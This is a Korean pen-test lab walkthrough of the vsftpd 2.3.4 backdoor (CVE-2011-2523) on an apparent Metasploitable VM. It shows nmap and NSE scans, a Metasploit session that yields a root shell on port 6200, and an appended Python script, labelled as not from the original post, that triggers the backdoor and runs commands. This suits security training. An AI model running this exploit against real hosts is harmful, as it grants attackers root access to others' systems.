Penetration Testing & Security
FTP Exploit
잉여토끼
2024. 10. 24. 11:43
Version scan with nmap
┌──(root㉿kaya)-[~]
└─# nmap -sV 172.16.20.14 -v
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 11:15 KST
NSE: Loaded 46 scripts for scanning.
Initiating ARP Ping Scan at 11:15
Scanning 172.16.20.14 [1 port]
Completed ARP Ping Scan at 11:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:15
Completed Parallel DNS resolution of 1 host. at 11:15, 0.00s elapsed
Initiating SYN Stealth Scan at 11:15
Scanning 172.16.20.14 [1000 ports]
Discovered open port 445/tcp on 172.16.20.14
Discovered open port 139/tcp on 172.16.20.14
Discovered open port 25/tcp on 172.16.20.14
Discovered open port 23/tcp on 172.16.20.14
Discovered open port 3306/tcp on 172.16.20.14
Discovered open port 21/tcp on 172.16.20.14
Discovered open port 5900/tcp on 172.16.20.14
Discovered open port 111/tcp on 172.16.20.14
Discovered open port 53/tcp on 172.16.20.14
Discovered open port 22/tcp on 172.16.20.14
Discovered open port 80/tcp on 172.16.20.14
Discovered open port 514/tcp on 172.16.20.14
Discovered open port 1099/tcp on 172.16.20.14
Discovered open port 2049/tcp on 172.16.20.14
Discovered open port 2121/tcp on 172.16.20.14
Discovered open port 1524/tcp on 172.16.20.14
Discovered open port 6667/tcp on 172.16.20.14
Discovered open port 5432/tcp on 172.16.20.14
Discovered open port 6000/tcp on 172.16.20.14
Discovered open port 8009/tcp on 172.16.20.14
Discovered open port 8180/tcp on 172.16.20.14
Discovered open port 512/tcp on 172.16.20.14
Discovered open port 513/tcp on 172.16.20.14
Completed SYN Stealth Scan at 11:15, 0.06s elapsed (1000 total ports)
Initiating Service scan at 11:15
Scanning 23 services on 172.16.20.14
Completed Service scan at 11:15, 11.14s elapsed (23 services on 1 host)
NSE: Script scanning 172.16.20.14.
Initiating NSE at 11:15
Completed NSE at 11:15, 0.09s elapsed
Initiating NSE at 11:15
Completed NSE at 11:15, 0.02s elapsed
Nmap scan report for 172.16.20.14
Host is up (0.00090s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5-log
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:7B:14:1A (VMware)
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.120KB)
The FTP banner identifies the service as vsftpd 2.3.4.
This version is affected by CVE-2011-2523.
https://www.cve.org/CVERecord?id=CVE-2011-2523
This is not a coding bug but a trojaned build: the vsftpd 2.3.4 source tarball on the project's download site was replaced with a backdoored copy in mid-2011. When the argument of the FTP USER command contains the string ":)", the daemon starts listening on TCP port 6200 and hands whoever connects a /bin/sh, which on this target (see below) runs as root.
Checking for the backdoor with the nmap NSE script ftp-vsftpd-backdoor. Note that this script is not a passive version check: it sends the trigger, connects to port 6200 and runs id, as the "Exploit results" section of its output shows, so it is exactly as intrusive as the exploit itself.
┌──(root㉿kaya)-[~]
└─# nmap --script ftp-vsftpd-backdoor -p 21 172.16.20.14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 11:19 KST
Nmap scan report for 172.16.20.14
Host is up (0.00035s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| https://www.securityfocus.com/bid/48539
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 00:0C:29:7B:14:1A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.21 seconds
The script reports the backdoor as VULNERABLE (Exploitable); it has already executed id through the backdoor and got uid=0(root), so the target is confirmed exploitable.
Exploitation with msf
Search for vsftpd
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service
1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor
Two modules match.
The second one, exploit/unix/ftp/vsftpd_234_backdoor, is the exploit for vsftpd 2.3.4 (rank excellent). Its Check column is "No": the module has no check method, which is why the NSE script above was used to verify the vulnerability first.
Select the module and review its options
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Set the required option RHOSTS with set. (RHOSTS is a module option, not a payload; the payload was already defaulted to cmd/unix/interact when the module was loaded.)
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.16.20.14
RHOSTS => 172.16.20.14
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.20.14 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Run the exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] 172.16.20.14:21 - Banner: 220 (vsFTPd 2.3.4)
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > [*] 172.16.20.14:21 - USER: 331 Please specify the password.
[+] 172.16.20.14:21 - Backdoor service has been spawned, handling...
[+] 172.16.20.14:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.16.20.10:36539 -> 172.16.20.14:6200) at 2024-10-24 11:30:25 +0900
A session was obtained. Because the exploit was started as a background job with -j, the line "Exploit completed, but no session was created." is printed immediately; the module then sends USER/PASS, sees port 6200 open ("Backdoor service has been spawned"), and session 1 is opened to 172.16.20.14:6200 a moment later.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 172.16.20.10:36539 -> 172.16.20.14:6200 (172.16.20.14)
Interact with the session
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 1
[*] Starting interaction with 1...
help
Meta shell commands
===================
Command Description
------- -----------
help Help menu
background Backgrounds the current shell session
sessions Quickly switch to another session
resource Run a meta commands script stored in a local file
shell Spawn an interactive shell (*NIX Only)
download Download files
upload Upload files
source Run a shell script on remote machine (*NIX Only)
irb Open an interactive Ruby shell on the current session
pry Open the Pry debugger on the current session
For more info on a specific command, use <command> -h or help <command>.
These are Metasploit's meta shell commands for a plain cmd/unix shell session (the help output is titled "Meta shell commands"), not Meterpreter. The payload was cmd/unix/interact, so session 1 is the raw /bin/sh served by the backdoor on port 6200, wrapped by msfconsole; anything typed here runs as root on the target.
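As an added example (not code from the original post, from Metasploit or from vsftpd), the same USER/PASS exchange the module performs above, written by hand in Python against a constructed stand-in server so it runs offline. Ports 21 and 6200 are the real ones; the stand-in's banner, replies and the canned "uid=0(root) gid=0(root)" output are constructed to mirror what the page's target returned, and vulnerable=False models a clean build where port 6200 never opens. Against a real lab target you would call trigger_backdoor("172.16.20.14") with the default ports.

```python
# Hand-rolled trigger for the vsftpd 2.3.4 backdoor (CVE-2011-2523) plus a
# constructed stand-in daemon; nothing here is vsftpd or Metasploit code.
import socket
import threading
import time

BACKDOOR_PORT = 6200   # port the trojaned daemon binds once triggered
TRIGGER = b":)"        # smiley anywhere in the USER argument is the trigger


def recv_line(sock, maxlen=1024):
    """Read one LF-terminated line (FTP replies are CRLF) and return it decoded."""
    buf = b""
    while not buf.endswith(b"\n") and len(buf) < maxlen:
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace").rstrip("\r\n")


def trigger_backdoor(host, ftp_port=21, backdoor_port=BACKDOOR_PORT,
                     command="id", timeout=5.0, attempts=10):
    """Send USER <junk>:) / PASS <junk>, connect to the bind shell, run one
    command and return its output. Raises RuntimeError if 6200 never opens."""
    ctrl = socket.create_connection((host, ftp_port), timeout=timeout)
    banner = recv_line(ctrl)                        # "220 (vsFTPd 2.3.4)"
    if not banner.startswith("220"):
        ctrl.close()
        raise RuntimeError(f"unexpected FTP greeting: {banner!r}")
    ctrl.sendall(b"USER x" + TRIGGER + b"\r\n")
    reply = recv_line(ctrl)                         # "331 Please specify the password."
    if reply.startswith("530"):
        ctrl.close()
        raise RuntimeError("USER rejected (anonymous-only server?): " + reply)
    ctrl.sendall(b"PASS y\r\n")
    # The trojaned child never answers PASS: it is blocked in accept() on the
    # bind shell. So do not read a reply; poll the backdoor port instead.
    shell = None
    for _ in range(attempts):
        try:
            shell = socket.create_connection((host, backdoor_port), timeout=timeout)
            break
        except OSError:
            time.sleep(0.3)
    ctrl.close()
    if shell is None:
        raise RuntimeError(f"backdoor port {backdoor_port} never opened")
    # The shell has no prompt and stays open; appending "exit" makes it hang
    # up after the command so the output can simply be read until EOF.
    shell.sendall(command.encode() + b"; exit\n")
    out = b""
    while chunk := shell.recv(4096):
        out += chunk
    shell.close()
    return out.decode(errors="replace").strip()


class SimulatedVsftpd234:
    """Constructed stand-in for the trojaned daemon: greets like 2.3.4 and, if
    the USER argument contains ":)", opens a one-shot listener that plays
    /bin/sh with canned output. vulnerable=False models a clean build."""
    CANNED = {"id": "uid=0(root) gid=0(root)"}   # constructed; what the page's target returned

    def __init__(self, host="127.0.0.1", vulnerable=True):
        self.vulnerable = vulnerable
        self.triggered = False
        self.ctrl = socket.socket()
        self.ctrl.bind((host, 0))
        self.ctrl.listen(1)
        self.back = socket.socket()
        self.back.bind((host, 0))        # bound but NOT listening until triggered
        self.ftp_port = self.ctrl.getsockname()[1]
        self.backdoor_port = self.back.getsockname()[1]
        threading.Thread(target=self._serve_control, daemon=True).start()

    def _serve_control(self):
        conn, _ = self.ctrl.accept()
        conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
        user = recv_line(conn)
        if self.vulnerable and TRIGGER.decode() in user:
            self.triggered = True
            self.back.listen(1)          # this is the moment "port 6200" opens
            threading.Thread(target=self._serve_shell, daemon=True).start()
        conn.sendall(b"331 Please specify the password.\r\n")
        recv_line(conn)                  # PASS; the real stuck child never replies

    def _serve_shell(self):
        conn, _ = self.back.accept()
        cmd = recv_line(conn).split(";")[0].strip()          # "id; exit" -> "id"
        conn.sendall((self.CANNED.get(cmd, f"sh: {cmd}: not found") + "\n").encode())
        conn.close()                     # the trailing "exit" closes the shell


def demo(vulnerable=True):
    """Run the trigger against a local stand-in; returns (triggered, output)."""
    srv = SimulatedVsftpd234(vulnerable=vulnerable)
    try:
        out = trigger_backdoor("127.0.0.1", srv.ftp_port, srv.backdoor_port, attempts=3)
    except RuntimeError as exc:
        out = f"failed: {exc}"
    return srv.triggered, out


if __name__ == "__main__":
    print(demo())                    # (True, 'uid=0(root) gid=0(root)')
    print(demo(vulnerable=False))    # (False, 'failed: backdoor port ... never opened')
```

Two details matter when this is pointed at a real host rather than the stand-in: the PASS reply must not be waited for, because the backdoored child is already sitting in accept() on port 6200 and will never send it; and the bind shell has no prompt, so either append exit to each command (as here) or keep the socket open and read with a timeout, which is what the msfconsole session does.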